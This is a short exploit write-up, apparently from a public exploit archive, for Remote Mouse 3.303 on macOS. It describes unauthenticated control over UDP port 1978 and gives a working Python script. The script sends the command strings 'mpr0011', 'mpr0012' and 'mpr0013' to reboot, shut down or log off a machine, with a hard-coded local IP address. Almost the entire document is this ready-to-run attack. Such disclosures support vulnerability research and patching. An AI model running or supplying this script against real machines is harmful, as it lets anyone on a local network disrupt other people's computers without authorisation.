# Exploit Title: Remote Mouse 3.303 - Remote Power Control (Shutdown/Reboot/Logoff) # Date: 24/07/2025 # Exploit Author: Chokri Hammedi # Vendor Homepage: https://www.remotemouse.net # Software Link: https://itunes.apple.com/app/remote-mouse/id403195710?mt=12 # Version: 3.303 (MacOS) # Tested on: macOS 14.4 ''' Description: Remote Mouse 3.303 (macOS) is vulnerable to unauthenticated remote power control due to weak access restrictions on UDP port 1978. An attacker on the same local network can send crafted packets to remotely shut down, restart, or log off the target system without requiring authentication. ''' import socket def send_udp(payload, ip, port=1978): with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s: s.sendto(payload.encode(), (ip, port)) def exploit(ip): options = { '1': ('mpr0011', "Reboot"), '2': ('mpr0012', "Shutdown"), '3': ('mpr0013', "Log off"), # '4': ('mpr0014', "Hibernate") } print("Select operation:") [print(f"{k}. {v[1]}") for k,v in options.items()] while True: choice = input("> ") if choice in options: send_udp(options[choice][0], ip) break print("Invalid choice") if __name__ == "__main__": exploit("192.168.8.103")